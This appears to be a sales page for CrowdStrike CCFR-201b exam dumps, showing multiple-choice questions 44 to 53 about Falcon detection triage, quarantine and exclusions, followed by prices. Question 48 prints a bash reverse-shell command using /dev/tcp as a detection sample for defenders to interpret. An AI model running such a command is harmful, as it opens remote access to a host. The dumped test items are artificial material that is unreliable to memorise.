Summer Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: Board70

CCFR-201b Exam Dumps - CrowdStrike CCFR Questions and Answers

Question # 44

What does the Full Detection Details option provide?

Options:

A.

It provides a visualization of program ancestry via the Process Tree View

B.

It provides a visualization of program ancestry via the Process Activity View

C.

It provides detailed list of detection events via the Process Table View

D.

It provides a detailed list of detection events via the Process Tree View

Buy Now
Question # 45

In the full detection tree view, icons provide visual cues about the telemetry. What does the specific icon representing a ' Falcon ' (blue bird) indicate to the responder?

Options:

A.

The file has been successfully quarantined by the sensor.

B.

There is related Intelligence (Intel) data available for this detection.

C.

The process has been identified as a legitimate system file.

D.

The host is currently undergoing a remote live response session.

Buy Now
Question # 46

An administrator needs to download a file for analysis that was blocked by the sensor. Where are quarantine files located within the Falcon UI?

Options:

A.

Investigate > Quarantine

B.

Endpoint Security > Monitor > Quarantined Files

C.

Configuration > Response > Quarantine

D.

Dashboards > Security > Quarantine

Buy Now
Question # 47

An analyst wants to see the raw events behind a specific detection. Which icon in the UI allows them to pivot directly to an event search?

Options:

A.

Shield icon

B.

Spyglass icon

C.

Trash can icon

D.

Gear icon

Buy Now
Question # 48

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

Options:

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

Buy Now
Question # 49

Sensor Visibility Exclusion patterns are written in which syntax?

Options:

A.

Glob Syntax

B.

Kleene Star Syntax

C.

RegEx

D.

SPL(Splunk)

Buy Now
Question # 50

An analyst notices a detection that has been automatically flagged with the ' New Activity ' status. Which of the following statements best describes what this status indicates?

Options:

A.

A brand new detection has been triggered on a host that was recently added to the network.

B.

A detection that was previously moved to a resolved status has generated new telemetry and activity.

C.

A user has logged into a machine for the first time since the sensor was installed.

D.

The Falcon Overwatch team has manually verified that the detection is an active threat.

Buy Now
Question # 51

What happens when you create a Sensor Visibility Exclusion for a trusted file path?

Options:

A.

It excludes host information from Detections and Incidents generated within that file path location

B.

It prevents file uploads to the CrowdStrike cloud from that file path

C.

It excludes sensor monitoring and event collection for the trusted file path

D.

It disables detection generation from that path, however the sensor can still perform prevention actions

Buy Now
Question # 52

Evaluate the following process tree observed in a detection:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe

Based on the parent-child relationships, which entry source is most likely?

Options:

A.

A remote service exploitation targeting a system process.

B.

A phishing attack where the user executed a malicious file from the desktop.

C.

A scheduled task running under the SYSTEM account.

D.

A supply chain attack targeting the Windows Boot manager.

Buy Now
Question # 53

What does pivoting to an Event Search from a detection do?

Options:

A.

It gives you the ability to search for similar events on other endpoints quickly

B.

It takes you to the raw Insight event data and provides you with a number of Event Actions

C.

It takes you to a Process Timeline for that detection so you can see all related events

D.

It allows you to input an event type, such as DNS Request or ASEP write, and search for those events within the detection

Buy Now
Exam Code: CCFR-201b
Exam Name: CrowdStrike Certified Falcon Responder
Last Update: Jul 5, 2026
Questions: 199
CCFR-201b pdf

CCFR-201b PDF

$25.5  $84.99
CCFR-201b Engine

CCFR-201b Testing Engine

$28.5  $94.99
CCFR-201b PDF + Engine

CCFR-201b PDF + Testing Engine

$40.5  $134.99